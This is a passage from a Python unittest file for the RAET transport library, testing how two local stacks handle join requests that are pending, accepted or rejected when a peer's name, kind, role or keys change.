self.assertEqual(ns2b(remoteData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(remoteData['pubhex']), beta.local.priver.pubhex)
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Allow beta to modify it's remote estate: set proper name and role for alpha remote estate on accept
beta.mutable = True
# Accept the transaction
alpha.keep.acceptRemote(alphaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
self.assertTrue(stack.mutable)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentNonVacuousPendingPendSameAll(self):
'''
Test joinent pend non-vacuous same all join (N1)
'''
console.terse("{0}\n".format(self.testJoinentNonVacuousPendingPendSameAll.__doc__))
# Status: Pending
# Mode: Never
alpha, beta = self.bootstrapStacks()
alpha.keep.auto = raeting.AutoMode.never.value
# Mutable: Either
alpha.mutable = True
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha)
# Ephemeral: No Nuid (the Nuid is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
alpha.keep.pendRemote(alphaRemote)
# Ensure remote status is Pending
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Name: Old
# Main: Old
# Kind: Old
# RHA: Old
# Nuid: Old
# Fuid: Old
# Leid: Old
# Reid: Old
# Role: Old
# Keys: Old
# Sameness: SameAll
keep = self.copyData(alphaRemote)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Pend, No change
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 1)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
# Assert alphaRemote is modified
self.assertTrue(self.sameAll(alphaRemote, keep))
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.pending.value)
self.assertIs(betaRemote.acceptance, None)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIsNot(remoteData, None)
self.assertEqual(remoteData['role'], beta.local.role)
self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(remoteData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(remoteData['pubhex']), beta.local.priver.pubhex)
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Allow beta to modify it's remote estate: set proper name and role for alpha remote estate on accept
beta.mutable = True
# Accept the transaction
alpha.keep.acceptRemote(alphaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
self.assertTrue(stack.mutable)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousImmutableRejectNewName(self):
'''
Test immutable joiner reject vacuous renewal join with updated name (A1)
'''
console.terse("{0}\n".format(self.testJoinerVacuousImmutableRejectNewName.__doc__))
# Mode: Never, Once, Always (use always as most loyal)
alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.always.value)
# Vacuous: Yes
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Ensure remote status is None
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Name: New
oldName = alpha.name
newName = '{0}_new'.format(oldName)
alpha.name = newName
# Main: Either
# Kind: Either
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(betaRemote, fuid=alphaRemote.nuid)
# Mutable: No
self.assertIs(beta.mutable, None)
# Test
# Renew: Yes
self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
# Action: Reject
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, None)
self.assertEqual(len(alpha.remotes), 0)
self.assertEqual(len(alpha.nameRemotes), 0)
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
self.assertTrue(self.sameAll(betaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
self.assertIs(remoteData, None)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], None)
self.assertEqual(roleData['verhex'], None)
self.assertEqual(roleData['pubhex'], None)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousImmutableRejectNewMain(self):
'''
Test immutable joiner reject vacuous renewal join with updated main (A2)
'''
console.terse("{0}\n".format(self.testJoinerVacuousImmutableRejectNewMain.__doc__))
# Mode: Never, Once, Always (use always as most loyal)
alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.always.value)
# Vacuous: Yes
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Ensure remote status is None
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Name: Either
# Main: New
betaRemote.main = False
self.assertTrue(alpha.main)
# Kind: Either
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(betaRemote, fuid=alphaRemote.nuid)
# Mutable: No
self.assertIs(beta.mutable, None)
# Test
# Renew: Yes
self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
# Action: Reject
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, None)
self.assertEqual(len(alpha.remotes), 0)
self.assertEqual(len(alpha.nameRemotes), 0)
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
self.assertTrue(self.sameAll(betaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
self.assertIs(remoteData, None)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], None)
self.assertEqual(roleData['verhex'], None)
self.assertEqual(roleData['pubhex'], None)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousImmutableRejectNewKind(self):
'''
Test immutable joiner reject vacuous renewal join with updated kind (A3)
'''
console.terse("{0}\n".format(self.testJoinerVacuousImmutableRejectNewKind.__doc__))
# Mode: Never, Once, Always (use always as most loyal)
alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.always.value)
# Vacuous: Yes
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Ensure remote status is None
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Name: Either
# Main: Either
# Kind: New
oldKind = alpha.kind
newKind = 33
self.assertNotEqual(oldKind, newKind)
alpha.kind = newKind
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(betaRemote, fuid=alphaRemote.nuid)
# Mutable: No
self.assertIs(beta.mutable, None)
# Test
# Renew: Yes
self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
# Action: Reject
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, None)
self.assertEqual(len(alpha.remotes), 0)
self.assertEqual(len(alpha.nameRemotes), 0)
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
self.assertTrue(self.sameAll(betaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
self.assertIs(remoteData, None)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], None)
self.assertEqual(roleData['verhex'], None)
self.assertEqual(roleData['pubhex'], None)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousImmutableRejectNewKeys(self):
'''
Test immutable joiner reject vacuous renewal join with updated keys (A4)
'''
console.terse("{0}\n".format(self.testJoinerVacuousImmutableRejectNewKeys.__doc__))
# Mode: Never, Once, Always (use always as most loyal)
alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.always.value)
# Vacuous: Yes
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Ensure remote status is None
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Name: Either
# Main: Either
# Kind: Either
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: Old
# Keys: New
alpha.local.signer = nacling.Signer()
alpha.local.priver = nacling.Privateer()
alpha.dumpLocalRole()
# Sameness: Not sameall, not same role/keys
keep = self.copyData(betaRemote, fuid=alphaRemote.nuid)
# Mutable: No
self.assertIs(beta.mutable, None)
# Test
# Renew: Yes
self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
# Action: Reject
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, None)
self.assertEqual(len(alpha.remotes), 0)
self.assertEqual(len(alpha.nameRemotes), 0)
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
self.assertTrue(self.sameAll(betaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
self.assertIs(remoteData, None)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], None)
self.assertEqual(roleData['verhex'], None)
self.assertEqual(roleData['pubhex'], None)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousImmutableRejectNewRole(self):
'''
Test immutable joiner reject vacuous renewal join with updated role (A5)
'''
console.terse("{0}\n".format(self.testJoinerVacuousImmutableRejectNewRole.__doc__))
# Mode: Never, Once, Always (use always as most loyal)
alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.always.value)
# Vacuous: Yes
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Name: Either
# Main: Either
# Kind: Either
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: New
oldRole = alpha.local.role
newRole = '{0}_new'.format(oldRole)
alpha.local.role = newRole
alpha.dumpLocalRole()
# Keys: Either
# Sameness: Not sameall, not same role/keys
keep = self.copyData(betaRemote, fuid=alphaRemote.nuid)
# Mutable: No
self.assertIs(beta.mutable, None)
# Ensure remote status is None
roleData = beta.keep.loadRemoteRoleData(oldRole)
self.assertEqual(roleData['role'], oldRole)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
roleData = beta.keep.loadRemoteRoleData(newRole)
self.assertEqual(roleData['role'], newRole)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Test
# Renew: Yes
self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
# Action: Reject
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, None)
self.assertEqual(len(alpha.remotes), 0)
self.assertEqual(len(alpha.nameRemotes), 0)
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
self.assertTrue(self.sameAll(betaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
self.assertIs(remoteData, None)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], None)
self.assertEqual(roleData['verhex'], None)
self.assertEqual(roleData['pubhex'], None)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousRejectedRejectNewKeys(self):
'''
Test mutable joiner reject vacuous renewal join with updated keys (B1)
'''
console.terse("{0}\n".format(self.testJoinerVacuousRejectedRejectNewKeys.__doc__))
# Mode: Never, Once
alpha, beta = self.bootstrapStacks()
beta.keep.auto = raeting.AutoMode.never.value
# Vacuous: Yes
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Status: Rejected
beta.keep.rejectRemote(betaRemote)
# Ensure remote status is Rejected
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Name: Either
# Main: Either
# Kind: Either
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: Old
# Keys: New
alpha.local.signer = nacling.Signer()
alpha.local.priver = nacling.Privateer()
# Sameness: Not sameall
keep = self.copyData(betaRemote, fuid=alphaRemote.nuid)
# Mutable: Yes
beta.mutable = True
# Test
# Renew: Yes
self.join(beta, alpha, deid=betaRemote.nuid, renewal=True)
# Action: Reject
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, raeting.Acceptance.rejected.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertEqual(len(alpha.remotes), 0)
self.assertEqual(len(alpha.nameRemotes), 0)
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
self.assertTrue(self.sameAll(betaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
self.assertIs(remoteData, None)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousRejectedRejectNewRole(self):
'''
Test mutable joiner reject vacuous renewal join with updated role (B2)
'''
console.terse("{0}\n".format(self.testJoinerVacuousRejectedRejectNewRole.__doc__))
alpha, alphaData = self.bootstrapStack(name='alpha',
ha=("", raeting.RAET_PORT),
main=True,
auto=raeting.AutoMode.once.value,
role=None,
kind=None,
mutable=True, )
self.assertIs(alpha.local.role, 'alpha')
self.assertEqual(alpha.ha, ('0.0.0.0', raeting.RAET_PORT))
self.assertEqual(alpha.local.ha, ('127.0.0.1', raeting.RAET_PORT))
beta, betaData = self.bootstrapStack(name='beta',
ha=("", raeting.RAET_TEST_PORT),
main=None,
auto=raeting.AutoMode.once.value,
role=None,
kind=None,
mutable=True, )
self.assertIs(beta.local.role, 'beta')
self.assertEqual(beta.ha, ('0.0.0.0', raeting.RAET_TEST_PORT))
self.assertEqual(beta.local.ha, ('127.0.0.1', raeting.RAET_TEST_PORT))
# Do initial join vacuous join to setup rejoin with renew
# create remote to join to alpha
remote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
self.join(beta, alpha, deid=remote.uid)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, True)
self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
alphaRemoteBeta = alpha.remotes.values()[0]
betaRemoteAlpha = beta.remotes.values()[0]
self.assertIs(beta.local.role, 'beta')
# save the current state of beta stack remote for alpha
betaRemoteAlphaSave = self.copyData(betaRemoteAlpha)
# move alpha stack remote for beta to different uid (nuid) to force renew
oldUid = alphaRemoteBeta.uid
alpha.moveRemote(alphaRemoteBeta, alphaRemoteBeta.uid + 1)
self.assertNotEqual(alphaRemoteBeta.uid, oldUid)
self.assertIs(alpha.remotes[alphaRemoteBeta.uid], alphaRemoteBeta)
# Status: Rejected
beta.keep.rejectRemote(betaRemoteAlpha)
self.assertEqual(betaRemoteAlpha.acceptance, raeting.Acceptance.rejected.value)
beta.keep.auto = raeting.AutoMode.never.value
self.assertEqual(beta.keep.auto, raeting.AutoMode.never.value)
# Name: Either
# Main: Either
# Kind: Either
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: New
oldRole = alpha.local.role
alpha.local.role = 'alpha_new'
self.assertIs(alpha.local.role, 'alpha_new')
self.assertNotEqual(alpha.local.role, oldRole)
# Keys: Either
# Sameness: Not sameall
# Mutable: Yes
self.assertIs(beta.mutable, True)
# Ensure remote status is Rejected
roleData = beta.keep.loadRemoteRoleData(oldRole)
self.assertEqual(roleData['role'], oldRole)
self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Ensure beta knows nothing about the new role
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
beta.clearStats()
alpha.clearStats()
# Test
# Renew: Yes
self.join(beta, alpha, deid=betaRemoteAlpha.uid, duration=0.5)
# Action: Pend, Dump
self.assertIn('joiner_rx_renew', beta.stats)
self.assertEqual(beta.stats['joiner_rx_renew'], 1)
self.assertIn('join_renew_attempt', beta.stats)
self.assertEqual(beta.stats['join_renew_attempt'], 1)
self.assertIn('stale_nuid', alpha.stats)
self.assertEqual(alpha.stats['stale_nuid'], 1)
self.assertIn('joinent_rx_pend', alpha.stats)
self.assertEqual(alpha.stats['joinent_rx_pend'], 2)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 1)
self.assertEqual(len(stack.remotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(beta.mutable, True)
self.assertFalse(self.sameAll(betaRemoteAlpha, betaRemoteAlphaSave))
self.assertFalse(self.sameRoleKeys(betaRemoteAlpha, betaRemoteAlphaSave))
self.assertEqual(betaRemoteAlpha.role, alpha.local.role)
self.assertIs(alphaRemoteBeta.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(betaRemoteAlpha.acceptance, raeting.Acceptance.pending.value)
# Check remote dump with pended data
remoteData = beta.keep.loadRemoteData(alpha.local.name)
self.assertIsNot(remoteData, None)
self.assertIs(remoteData['fuid'], alphaRemoteBeta.nuid) # new value
self.assertEqual(remoteData['role'], alpha.local.role)
self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(remoteData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(remoteData['pubhex']), alpha.local.priver.pubhex)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Reject the transaction
alpha.clearStats()
beta.clearStats()
console.terse("\nAccept Transaction **************\n")
beta.keep.rejectRemote(betaRemoteAlpha)
self.serviceStacks([alpha, beta], duration=6.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertEqual(len(alpha.remotes), 1)
self.assertEqual(len(beta.remotes), 0)
self.assertTrue(beta.mutable)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 2)
self.assertEqual(betaRemoteAlpha.role, alpha.local.role)
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
self.assertIs(remoteData, None)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerVacuousRejectedRejectSameAll(self):
'''
Test joiner reject rejected vacuous renewal join with same all (C1)
'''
console.terse("{0}\n".format(self.testJoinerVacuousRejectedRejectSameAll.__doc__))
# Mode: Never, Once
alpha, beta = self.bootstrapStacks()
beta.keep.auto = raeting.AutoMode.never.value
# Vacuous: Yes
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
main=True,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
